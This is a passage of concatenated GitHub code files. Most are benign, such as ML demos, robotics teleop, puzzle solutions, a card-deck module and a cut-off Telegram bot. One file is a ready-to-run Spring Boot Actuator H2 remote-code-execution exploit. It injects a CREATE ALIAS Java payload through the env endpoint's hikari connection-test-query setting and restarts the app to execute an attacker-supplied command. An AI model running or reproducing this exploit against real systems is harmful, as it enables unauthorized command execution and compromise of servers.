graph=None, player_start=[0]):\n super(GameScene, self).__init__()\n\n if graph:\n self.G = graph\n else:\n self.G = levels.generate_random_level()\n\n #add scrolling manager\n self.game_layer_controller = GameLayerController(self.G)\n self.add(self.game_layer_controller)\n\n #add base_layer\n self.base_layer = cocos.layer.ColorLayer(*settings.COLOUR_DATA['game']['background'])\n self.add(self.base_layer)\n","repo_name":"meshy/linkrease","sub_path":"linkrease/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"44475256426","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.datasets import make_moons\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import PolynomialFeatures, StandardScaler\nfrom sklearn.svm import SVC\n\n# Compare different kernel functions\n\nX, y = make_moons(n_samples=100, noise=0.15, random_state=42)\n\n# Compare two SVMs with different polynomial degrees\n\npoly_kernal_svm_clf = Pipeline([\n (\"scaler\", StandardScaler()),\n (\"svm_clf\", SVC(kernel=\"poly\", degree=3, coef0=1, C=5))\n])\n\npoly100_kernal_svm_clf = Pipeline([\n (\"scaler\", StandardScaler()),\n (\"svm_clf\", SVC(kernel=\"poly\", degree=100, coef0=1, C=5))\n])\npoly_kernal_svm_clf.fit(X, y)\npoly100_kernal_svm_clf.fit(X, y)\n\n\n# Plotting\ndef plot_dataset(X, y, axes):\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], \"bs\")\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], \"g^\")\n plt.axis(axes)\n plt.grid(True, which='both')\n\n\ndef plot_predictions(clf, axes):\n x0s = np.linspace(axes[0], axes[1], 100)\n x1s = np.linspace(axes[2], axes[3], 100)\n x0, x1 = np.meshgrid(x0s, x1s) # coordinate matrices -- each element of x0 pairs with the element of x1 at the same position to form one grid point\n X = np.c_[x0.ravel(), x1.ravel()] # x0 holds the x-coordinates and x1 the y-coordinates of every grid point; each is a 100*100 matrix\n y_pred = clf.predict(X).reshape(x0.shape)\n plt.contourf(x0, x1, y_pred, cmap=plt.cm.brg, alpha=0.2) # contour plot\n\n\nplt.subplot(121)\nplot_predictions(poly_kernal_svm_clf, [-1.5, 2.5, -1, 1.5])\nplot_dataset(X, y, [-1.5, 2.5, -1, 1.5])\nplt.title('degree=3')\nplt.subplot(122)\nplot_predictions(poly100_kernal_svm_clf, [-1.5, 2.5, -1, 1.5])\nplot_dataset(X, y, [-1.5, 2.5, -1, 1.5])\n
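# Possible extension (a sketch, not in the original file): an RBF kernel could be compared the same way, e.g.\n# rbf_kernel_svm_clf = Pipeline([(\"scaler\", StandardScaler()), (\"svm_clf\", SVC(kernel=\"rbf\", gamma=5, C=0.001))])\n# rbf_kernel_svm_clf.fit(X, y) followed by plot_predictions(rbf_kernel_svm_clf, [-1.5, 2.5, -1, 1.5]) would plot its boundary\n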
plt.title('degree=100')\nplt.show()\n","repo_name":"siZaiMou/ML-Python-learning","sub_path":"SVM/no_linear_kernal.py","file_name":"no_linear_kernal.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73398840832","text":"import os\nfrom glob import glob\n\nfrom setuptools import setup\n\npackage_name = \"fogros2_examples\"\n\nsetup(\n name=package_name,\n version=\"0.0.1\",\n packages=[package_name],\n data_files=[\n (\n \"share/ament_index/resource_index/packages\",\n [os.path.join(\"resource\", package_name)],\n ),\n (os.path.join(\"share\", package_name), [\"package.xml\"]),\n (os.path.join(\"share\", package_name), glob(\"launch/*.launch.py\")),\n ],\n install_requires=[\"setuptools\"],\n zip_safe=True,\n author=\"Kaiyuan (Eric) Chen, Víctor Mayoral-Vilches\",\n author_email=\"kych@berkeley.edu, v.mayoralv@gmail.com\",\n maintainer=\"Kaiyuan (Eric) Chen\",\n maintainer_email=\"kych@berkeley.edu\",\n description=\"TODO: Package description\",\n license=\"TODO: License declaration\",\n tests_require=[\"pytest\"],\n entry_points={\n \"console_scripts\": [\n \"talker = fogros2_examples.talker:main\",\n \"listener = fogros2_examples.listener:main\",\n ],\n },\n)\n","repo_name":"BerkeleyAutomation/FogROS2","sub_path":"fogros2_examples/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"60"} +{"seq_id":"74259840832","text":"import numpy as np\nimport sigpy as sp\nimport time\nimport optpoly\n\nfrom tqdm.auto import tqdm\n\ndef unconstrained(num_iters, A, b, proxg, pdeg=None,\n norm=\"l_2\", l=0, verbose=True):\n\n device = sp.get_device(b)\n xp = device.xp\n\n P = sp.linop.Identity(A.ishape) if pdeg is None else \\\n optpoly.create_polynomial_preconditioner(pdeg, A.N, l, 1, \\\n norm=norm, verbose=verbose)\n\n with device:\n\n AHb = A.H(b)\n x = AHb.copy()\n z = x.copy()\n\n lst_time = []\n calc_tol = -1\n if verbose:\n pbar = tqdm(total=num_iters, desc=\"Unconstrained Optimization\", \\\n leave=True)\n for k in range(1, num_iters + 1):\n start_time = time.perf_counter()\n \n x_old = x.copy()\n x = z.copy()\n \n gr = A.N(x) - AHb\n x = proxg(1, x - P(gr))\n \n # DOI: 10.1007/s10957-015-0746-4\n step = (k - 1)/(k + 4) # momentum weight for the accelerated proximal gradient update\n\n z = x + step * (x - x_old)\n\n end_time = time.perf_counter()\n lst_time.append(end_time - start_time)\n\n if verbose:\n pbar.update()\n pbar.refresh()\n\n if verbose:\n pbar.close()\n\n return x\n","repo_name":"SophieSchau/MRF_demo_ISMRM2022","sub_path":"src/02_recon/optalg.py","file_name":"optalg.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"4343270099","text":"from collections import deque\r\nn, k = map(int, input().split())\r\n\r\narr = deque()\r\nfor i in range(1, n+1):\r\n arr.append(i)\r\nprint('<', end='')\r\nwhile(True):\r\n for i in range(k):\r\n if(len(arr) == 0):\r\n break\r\n x = arr.popleft()\r\n if(i == k-1):\r\n print(f'{x}', end='')\r\n break\r\n arr.append(x)\r\n if(len(arr) == 0):\r\n break\r\n print(', ', end='')\r\n\r\n\r\nprint('>')","repo_name":"mobuktodae/baekjoon","sub_path":"백준/Silver/11866. 
요세푸스 문제 0/요세푸스 문제 0.py","file_name":"요세푸스 문제 0.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17399607426","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/5/15 13:19\r\n# @Author : GFX\r\n# @Site : \r\n# @File : train.py\r\n# @Software: PyCharm\r\n\r\n# 3 Model training\r\n# 3.1 Network training initialisation\r\n\r\nfrom neural_net import TwoLayerNet\r\nfrom DataPreprocess import *\r\n# =============================================================================\r\n# from numpy import mean\r\n# =============================================================================\r\n\r\ninput_size = 32 * 32 * 3\r\nhidden_size = 50\r\nnum_classes = 10\r\nnet = TwoLayerNet(input_size, hidden_size, num_classes)\r\nstats = net.train(X_train, y_train, X_val, y_val, num_iters=1000, batch_size=200,\r\n learning_rate=1e-4, learning_rate_decay=0.95, reg=0.5, verbose=True)\r\nval_acc = (net.predict(X_val) == y_val).mean()\r\nprint('validation accuracy:', val_acc)\r\n# Output:\r\n# iteration 0 / 1000 : loss 2.302975\r\n# iteration 100 / 1000 : loss 2.302409\r\n# iteration 200 / 1000 : loss 2.297453\r\n# iteration 300 / 1000 : loss 2.274700\r\n# iteration 400 / 1000 : loss 2.211710\r\n# iteration 500 / 1000 : loss 2.126385\r\n# iteration 600 / 1000 : loss 2.074668\r\n# iteration 700 / 1000 : loss 2.056960\r\n# iteration 800 / 1000 : loss 2.002378\r\n# iteration 900 / 1000 : loss 2.004737\r\n# validation accuracy: 0.279\r\n\r\n\r\n# =============================================================================\r\n# import matplotlib.pyplot as plt\r\n# \r\n# \r\n# plt.plot()\r\n# \r\n# plt.subplot(211)\r\n# plt.plot(stats['loss_history'])\r\n# plt.title('loss history')\r\n# plt.xlabel('iteration')\r\n# plt.ylabel('loss')\r\n# \r\n# plt.subplot(212)\r\n# plt.plot(stats['train_acc_history'],label='train')\r\n# plt.plot(stats['val_acc_history'],label='val')\r\n# plt.title('classification accuracy history')\r\n# plt.xlabel('epoch')\r\n# plt.ylabel('classification accuracy')\r\n# plt.show()\r\n# =============================================================================\r\n","repo_name":"xungeer29/Stanford-CS231n-Convolutional-Neural-Networks-for-Visual-Recognition","sub_path":"Assignment/Two Layers Neural Network/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"29272508920","text":"import os\nimport select\nimport sys\nimport rclpy\nimport cv2\nimport numpy as np\nfrom time import sleep\n\nimport subprocess\nfrom rclpy.node import Node\n\nfrom geometry_msgs.msg import Twist\nfrom rclpy.qos import QoSProfile\n\nif os.name == 'nt':\n import msvcrt\nelse:\n import termios\n import tty\n\nBURGER_MAX_LIN_VEL = 0.22\nBURGER_MAX_ANG_VEL = 2.84\n\nWAFFLE_MAX_LIN_VEL = 0.26\nWAFFLE_MAX_ANG_VEL = 1.82\n\nLIN_VEL_STEP_SIZE = 0.01\nANG_VEL_STEP_SIZE = 0.01\n\nTURTLEBOT3_MODEL = os.environ['TURTLEBOT3_MODEL']\n\nmsg = \"\"\"\nControl Your TurtleBot3!\n---------------------------\nMoving around:\n w\n a s d\n x\n\nw/x : increase/decrease linear velocity (Burger : ~ 0.22, Waffle and Waffle Pi : ~ 0.26)\na/d : increase/decrease angular velocity (Burger : ~ 2.84, Waffle and Waffle Pi : ~ 1.82)\n\nspace key, s : force stop\n\nCTRL-C to quit\n\"\"\"\n\ne = \"\"\"\nCommunications Failed\n\"\"\"\n\n\n\n\n# Cam methods\n\ndef findColor(img,lower_color,upper_color):\n img = cv2.GaussianBlur(img, (11, 
11), 0)\n imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n count = 0\n newPoints = []\n #for each of these colors we create a mask\n kernel = np.ones((9,9),np.uint8)\n mask = cv2.inRange(imgHSV, lower_color, upper_color)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n # find contours in the mask and initialize the current\n # (x, y) center of the ball\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n if len(cnts) > 0:\n # find the largest contour in the mask, then use it to compute the minimum enclosing circle and centroid\n c = max(cnts, key=cv2.contourArea)\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n # only proceed if the radius meets a minimum size. Correct this value for your object's size\n if radius > 0.5:\n return x,y\n return None, None\n\n \n\ndef getContours(img):\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n x,y,w,h = 0,0,0,0\n if len(contours) > 0:\n for cnt in contours:\n area = cv2.contourArea(cnt)\n print(area)\n if area>80:\n peri = cv2.arcLength(cnt,True)\n approx = cv2.approxPolyDP(cnt,0.02*peri,True)\n x, y, w, h = cv2.boundingRect(approx)\n return x+w//2, y \n\n\n\ncap = cv2.VideoCapture(\"http://192.168.1.100:8080/?action=stream\")\n\n\nlower_Blue = np.array([100, 100, 50])\nupper_Blue = np.array([130, 255, 255])\n\n\nlower_color = lower_Blue\nupper_color = upper_Blue\n\n\nmyColorValues = [[0,0,255]]\n\n\n\n\ndef get_key(settings):\n if os.name == 'nt':\n return msvcrt.getch().decode('utf-8')\n tty.setraw(sys.stdin.fileno())\n rlist, _, _ = select.select([sys.stdin], [], [], 0.1)\n if rlist:\n key = sys.stdin.read(1)\n else:\n key = ''\n\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n return key\n\n\ndef print_vels(target_linear_velocity, target_angular_velocity):\n print('currently:\\tlinear velocity {0}\\t angular velocity {1} '.format(\n target_linear_velocity,\n target_angular_velocity))\n\n\ndef make_simple_profile(output, input, slop):\n if input > output:\n output = min(input, output + slop)\n elif input < output:\n output = max(input, output - slop)\n else:\n output = input\n\n return output\n\n\ndef constrain(input_vel, low_bound, high_bound):\n if input_vel < low_bound:\n input_vel = low_bound\n elif input_vel > high_bound:\n input_vel = high_bound\n else:\n input_vel = input_vel\n\n return input_vel\n\n\ndef check_linear_limit_velocity(velocity):\n if TURTLEBOT3_MODEL == 'burger':\n return constrain(velocity, -BURGER_MAX_LIN_VEL, BURGER_MAX_LIN_VEL)\n else:\n return constrain(velocity, -WAFFLE_MAX_LIN_VEL, WAFFLE_MAX_LIN_VEL)\n\n\ndef check_angular_limit_velocity(velocity):\n if TURTLEBOT3_MODEL == 'burger':\n return constrain(velocity, -BURGER_MAX_ANG_VEL, BURGER_MAX_ANG_VEL)\n else:\n return constrain(velocity, -WAFFLE_MAX_ANG_VEL, WAFFLE_MAX_ANG_VEL)\n\n\n\nsettings = None\nif os.name != 'nt':\n settings = termios.tcgetattr(sys.stdin)\n\nrclpy.init()\n\nqos = QoSProfile(depth=10)\nnode = rclpy.create_node('teleop_keyboard')\npub = node.create_publisher(Twist, 'cmd_vel', qos)\n\nstatus = 0\ntarget_linear_velocity = 0.0\ntarget_angular_velocity = 0.0\ncontrol_linear_velocity = 0.0\ncontrol_angular_velocity = 0.0\n\n\n\nframeCounter = 0\n\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n frameResult = frame.copy()\n\n direction=\"\"\n\n\n frameCounter = frameCounter+1\n
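 # findColor returns (None, None) when no matching blob is detected, so downstream code should guard on that\n x,y = 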
findColor(frame,lower_color,upper_color)\n #print(\"x: \"+str(x)+\" y:\"+str(y))\n if (frameCounter >=30) :\n frameCounter = 0\n \n\n cv2.imshow(\"Result\", frameResult)\n\n\n\n key = get_key(settings)\n if key == 'w':\n target_linear_velocity = check_linear_limit_velocity(target_linear_velocity + LIN_VEL_STEP_SIZE)\n print(\"w detected\")\n status = status + 1\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'x':\n target_linear_velocity = check_linear_limit_velocity(target_linear_velocity - LIN_VEL_STEP_SIZE)\n print(\"x detected\")\n status = status + 1\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif direction == 'L':\n #target_angular_velocity =check_angular_limit_velocity(target_angular_velocity + ANG_VEL_STEP_SIZE)\n status = status + 1\n print (\"L\")\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif direction == 'R':\n #target_angular_velocity = check_angular_limit_velocity(target_angular_velocity - ANG_VEL_STEP_SIZE)\n status = status + 1\n print (\"R\")\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif direction == 'F':\n target_linear_velocity = 0.0\n control_linear_velocity = 0.0\n target_angular_velocity = 0.0\n control_angular_velocity = 0.0\n #print_vels(target_linear_velocity, target_angular_velocity)\n else:\n if (key == '\\x03'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n if status == 20:\n print(msg)\n status = 0\n\n twist = Twist()\n\n control_linear_velocity = make_simple_profile(\n control_linear_velocity,\n target_linear_velocity,\n (LIN_VEL_STEP_SIZE / 2.0))\n\n twist.linear.x = control_linear_velocity\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n\n control_angular_velocity = make_simple_profile(\n control_angular_velocity,\n target_angular_velocity,\n (ANG_VEL_STEP_SIZE / 2.0))\n\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = control_angular_velocity\n\n print (\"publish Twist\")\n pub.publish(twist)\n\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef main():\n settings = None\n if os.name != 'nt':\n settings = termios.tcgetattr(sys.stdin)\n\n rclpy.init()\n\n qos = QoSProfile(depth=10)\n node = rclpy.create_node('teleop_keyboard')\n pub = node.create_publisher(Twist, 'cmd_vel', qos)\n\n status = 0\n target_linear_velocity = 0.0\n target_angular_velocity = 0.0\n control_linear_velocity = 0.0\n control_angular_velocity = 0.0\n\n center = 480\n\n \n\n try:\n print(msg)\n while(1):\n\n key = get_key(settings)\n if key == 'w':\n target_linear_velocity =\\\n check_linear_limit_velocity(target_linear_velocity + LIN_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'x':\n target_linear_velocity =\\\n check_linear_limit_velocity(target_linear_velocity - LIN_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'a':\n target_angular_velocity =\\\n check_angular_limit_velocity(target_angular_velocity + ANG_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'd':\n target_angular_velocity =\\\n check_angular_limit_velocity(target_angular_velocity - ANG_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == ' ' or key == 's':\n target_linear_velocity = 0.0\n control_linear_velocity = 0.0\n target_angular_velocity = 0.0\n 
control_angular_velocity = 0.0\n print_vels(target_linear_velocity, target_angular_velocity)\n else:\n if (key == '\\x03'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n if status == 20:\n print(msg)\n status = 0\n\n twist = Twist()\n\n control_linear_velocity = make_simple_profile(\n control_linear_velocity,\n target_linear_velocity,\n (LIN_VEL_STEP_SIZE / 2.0))\n\n twist.linear.x = control_linear_velocity\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n\n control_angular_velocity = make_simple_profile(\n control_angular_velocity,\n target_angular_velocity,\n (ANG_VEL_STEP_SIZE / 2.0))\n\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = control_angular_velocity\n\n pub.publish(twist)\n\n except Exception as e:\n print(e)\n\n finally:\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n\n pub.publish(twist)\n\n if os.name != 'nt':\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mdequanter/ROS2_bridge_TurtlebotPlusOpenManipulator","sub_path":"turtlebot3ControlByCamera.py","file_name":"turtlebot3ControlByCamera.py","file_ext":"py","file_size_in_byte":10339,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"1701020287","text":"#!/usr/bin/python3\n'''A module for working with lockboxes.\n'''\n\n\ndef canUnlockAll(boxes):\n '''Checks if all the boxes in a list of boxes containing the keys\n (indices) to other boxes can be unlocked given that the first\n box is unlocked.\n '''\n unlocked = {0}\n stack = [0]\n\n # depth-first traversal: each key found in an unlocked box may open another box\n while stack:\n for key in boxes[stack.pop()]:\n if isinstance(key, int) and 0 <= key < len(boxes) and key not in unlocked:\n unlocked.add(key)\n stack.append(key)\n\n return len(unlocked) == len(boxes)\n","repo_name":"Henree001/alx-interview","sub_path":"0-lockboxes.py","file_name":"0-lockboxes.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17659345756","text":"class Solution(object):\n def letterCasePermutation(self, s):\n l =len(s)\n new =[]\n new.append(s)\n for i in range(0,l):\n if s[i].isalpha():\n temp =[]\n for j in range(0,len(new)):\n temp.append(new[j][0:i]+ s[i].lower()+ new[j][i+1:])\n temp.append(new[j][0:i]+ s[i].upper()+ new[j][i+1:])\n new=temp\n return new\n ","repo_name":"surmayi/CodePython","sub_path":"LeetCodeEasy/letterCasePermutation.py","file_name":"letterCasePermutation.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23201743817","text":"import csv\nimport mgrs\n\n# This script converts lat and long to an MGRS (Military Grid Reference System) reference\nout_csv = []\nfile = 'in_file'\noutfile = 'out_file.csv'\n\nwith open(file, mode='r') as infile:\n reader = csv.reader(infile)\n count = 0\n for rows in reader:\n print(rows)\n #first row in CSV is header, so need to handle this case\n if count == 0:\n header = rows\n header.append('MGRS')\n else:\n lat = float(rows[1])\n long = float(rows[2])\n m = mgrs.MGRS()\n c = m.toMGRS(lat, long)\n print(c)\n # this is of type(byte), so need to convert to string as below\n rows.append(c.decode(\"utf-8\"))\n count += 1\n out_csv.append(rows)\n\n\n
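# Illustrative note (format only; the digits below are placeholders, not output from this script):\n# toMGRS() returns a bytes value like b'15TWG...' -- grid zone designator, 100 km square id, then easting/northing digits\nwith open(outfile, 'w') as myfile:\n wr = 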
with open(outfile, 'w') as myfile:\n    wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n    for rows in out_csv:\n        wr.writerow(rows)\n","repo_name":"saparikh/gis-code","sub_path":"mgrs.py","file_name":"mgrs.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10672641034","text":"# https://www.codewars.com/kata/54d7660d2daf68c619000d95/train/python\n\n\ndef gcd(a, b):\n    if a == 0:\n        return b\n    return gcd(b % a, a)\n\n\ndef lcm(a, b):\n    return (a * b) // gcd(a, b)\n\n\ndef convertFracts(lst):\n    # the common denominator is the least common multiple of all denominators;\n    # scaling each numerator by denominator // d keeps everything in integers\n    if not lst:\n        return []\n    denominator = 1\n    for _, d in lst:\n        denominator = lcm(denominator, d)\n    return [[n * (denominator // d), denominator] for n, d in lst]\n\n\nprint(convertFracts([[1, 3], [1, 4], [1, 6], [1, 12]]))\n","repo_name":"oguzhanun/10_PythonProjects","sub_path":"challange/codewars/common_denominator.py","file_name":"common_denominator.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10226068826","text":"import requests\nimport sys\nimport json\nimport argparse\n\ndef check_vulnerable(url):\n    env_endpoint = url\n    try:\n        r = requests.get(env_endpoint)\n        if \"hikari\" in r.text:\n            print(\"[+] {url} is vulnerable to Springboot Actuator H2 rce!\".format(url=url))\n        else:\n            print(\"[!] {url} is not vulnerable to Springboot Actuator H2 rce!\".format(url=url))\n            sys.exit()\n    except Exception as e:\n        print(\"[!] An error occurred when accessing {url}/actuator/env\".format(url=url))\n        print(e)\n        sys.exit()\n\ndef send_payload(url, cmd):\n    exploit_endpoint = url\n    exploit_code = \"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('\"+cmd+\"');\"\n    payload = {\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\": exploit_code}\n    headers = {\n        \"Content-Type\":\"application/json\"\n    }\n    try:\n        r = requests.post(exploit_endpoint, headers=headers, data=json.dumps(payload))\n        print(\"[+] Payload sent to {url}/actuator/env\".format(url=url))\n    except Exception as e:\n        print(\"[!] 
An error occurred when sending exploit payload to {url}/actuator/env\".format(url=url))\n        print(e)\n        sys.exit()\n\ndef restart_actuator(url):\n    exploit_endpoint = url.replace(\"/env\", \"/restart\")\n    headers = {\n        \"Content-Type\":\"application/json\"\n    }\n    try:\n        r = requests.post(exploit_endpoint, headers=headers)\n        if r.json()[\"message\"] == \"Restarting\":\n            print(\"[+] Exploit succeeded!\")\n        else:\n            print(\"[*] Exploit failed!\")\n    except Exception as e:\n        print(\"[!] An error occurred when restarting {url}\".format(url=url))\n        print(e)\n        sys.exit()\n\ndef exploit(url, cmd):\n    check_vulnerable(url)\n    send_payload(url, cmd)\n    restart_actuator(url)\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--url', help='Target url')\n    parser.add_argument('--cmd', help='Exec CMD')\n    args = parser.parse_args()\n    exploit(args.url, args.cmd)\n","repo_name":"myh0st/scripts","sub_path":"springboot-h2-db-rce.py","file_name":"springboot-h2-db-rce.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"60"} +{"seq_id":"32232835174","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Playing cards module for teaching loops\"\"\"\nimport random\nfrom typing import List, Tuple\n\nsuit_symbols = {\"clubs\": \"♣\", \"diamonds\": \"♦\", \"hearts\": \"♥\", \"spades\": \"♠\"}\nranks = [\"A\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\"]\n\n\nclass Card:\n    \"\"\"\n    Class describing playing card objects\n    \"\"\"\n    def __init__(self, suit: str, rank: str):\n        self.suit = suit\n        self.rank = rank\n        self.value = ranks.index(rank) + 1\n\n    def __repr__(self):\n        return f\"{suit_symbols[self.suit]}{self.rank}\"\n\n    def __gt__(self, other):\n        return self.value > other.value\n\n\ndef full_deck() -> List[Card]:\n    \"\"\"Return an ordered full 52-card deck.\"\"\"\n    deck = []\n    for suit in suit_symbols.keys():\n        for rank in ranks:\n            deck.append(Card(suit, rank))\n    return deck\n\n\ndef deck_from_list(input: List[Tuple]) -> List[Card]:\n    return [Card(*card) for card in input]\n\n\ndef shuffle(deck: List[Card]) -> List[Card]:\n    \"\"\"Shuffle a deck of cards (list of Card objects) in place.\"\"\"\n    for i, card in enumerate(deck):\n        r = random.randint(0, len(deck) - 1)\n        deck[r], deck[i] = deck[i], deck[r]\n    return deck\n\n\n# Get a small random deck\ndef small_random_deck(size: int) -> List[Card]:\n    deck = full_deck().copy()\n    if size > 52: size = 52\n    return shuffle(deck)[:size]\n\n\n# Get a small random deck that is guaranteed to have at least one heart and one diamond\ndef safe_small_random_deck(size: int) -> List[Card]:\n    deck = full_deck().copy()\n    if size > 52: size = 52\n    subdeck = shuffle(deck)[:size]\n    has_hearts = False\n    has_diamonds = False\n    for c in subdeck:\n        if c.suit == 'hearts':\n            has_hearts = True\n        elif c.suit == 'diamonds':\n            has_diamonds = True\n        if has_hearts and has_diamonds:\n            break\n    if not has_hearts:\n        if subdeck[0].suit != 'diamonds':\n            subdeck[0] = Card('hearts', ranks[random.randint(0, len(ranks) - 1)])\n        else:\n            subdeck[1] = Card('hearts', ranks[random.randint(0, len(ranks) - 1)])\n    if not has_diamonds:\n        if subdeck[0].suit != 'hearts':\n            subdeck[0] = Card('diamonds', ranks[random.randint(0, len(ranks) - 1)])\n        else:\n            subdeck[1] = Card('diamonds', ranks[random.randint(0, len(ranks) - 1)])\n    shuffle(subdeck)\n    return subdeck\n\n
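# A quick, illustrative usage sketch for the helpers above:\n#   hand = shuffle(full_deck())[:5]   # deal five random cards\n#   best = max(hand)                  # works because Card defines __gt__\n\n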
# add a card to a deck, useful for testing (not destructive)\ndef insert_card(deck: List[Card], rank: str, suit: str, index=None) -> List[Card]:\n    # a random default must be drawn per call; random.random() in the signature\n    # would be evaluated once at import time and yields a float, which cannot\n    # be used to slice a list\n    if index is None:\n        index = random.randint(0, len(deck))\n    new_deck = deck.copy()\n    new_card = Card(suit, rank)\n    first_half = new_deck[:index]\n    second_half = new_deck[index:]\n    first_half.append(new_card)\n    out_deck = first_half + second_half\n    return out_deck\n\n","repo_name":"irabkina/python-loops","sub_path":"cards/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32816317536","text":"'''\nn! = 1*2*3*4*5*6*7*...*n\nn! = 1*2*3*4*5*...*(n-1)*n\nn! = [1*2*3*4*5*...*(n-1)]*n\nn! = (n-1)!*n\n'''\n\ndef factorial_recursive(fact):\n    if fact == 1 or fact == 0:\n        return 1\n    return factorial_recursive(fact - 1) * fact\n\n\nresultant = factorial_recursive(5)\nprint(resultant)\n","repo_name":"user-candycode/python-programs","sub_path":"first/eight/03_factorial_function.py","file_name":"03_factorial_function.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"21296185566","text":"import re\n\npattern = r\"((www\\.)([a-zA-Z0-9\\-]+)(\\.[a-z]+)+)\"\n\nres = []\n\nline = input()\n\nwhile True:\n    if line:\n        matches = re.search(pattern, line)\n        if matches:\n            res.append(matches.group(0))\n        line = input()\n    else:\n        break\n\nprint('\\n'.join(res))","repo_name":"ZhekoGinev/SoftUni","sub_path":"Python/01-python-fundamentals/09-regex/02-exercise/06-extract-the-links.py","file_name":"06-extract-the-links.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"3118852104","text":"import os\nfrom dotenv import load_dotenv\nimport openai\nfrom telegram import Update\nfrom telegram.ext import Application, ContextTypes, MessageHandler, filters\nfrom langchain.prompts import (\n    ChatPromptTemplate,\n    MessagesPlaceholder,\n    SystemMessagePromptTemplate,\n    HumanMessagePromptTemplate,\n)\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.chains import LLMChain\nfrom langchain.chat_models import ChatOpenAI\nfrom elevenlabs import generate\nfrom pydub import AudioSegment\n\n\nasync def on_messages(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n    \"\"\"Callback that handles incoming 